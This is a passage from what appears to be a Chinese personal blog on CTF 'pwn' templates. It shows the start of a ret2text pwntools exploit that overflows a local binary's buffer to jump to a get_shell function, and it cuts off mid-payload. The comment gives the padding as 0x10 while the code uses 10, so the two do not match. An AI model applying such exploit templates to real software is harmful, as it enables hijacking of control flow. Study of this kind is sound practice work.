LUO
一个兴趣使然的人与他兴趣使然的博客
🔖Pwn
»
Pwn 常用模板
[ret2text]#!/usr/bin/python3
# import pwn 工具包 (pwntools)
from pwn import *
# 将pwn1程序启动为进程
p = process('./pkmon')
# 构建payload,flat是将列表中的元素给组合起来
# "A" * 0x10 这个是vuln函数缓冲区大小
# p64(0xdeadbeef)表示8字节的整数,用来覆盖rbp,这个值可以任意填
# p64(0x400686)返回地址,返回到get_shell函数开头
payload = flat([b'a'*10, p64(0xdeadb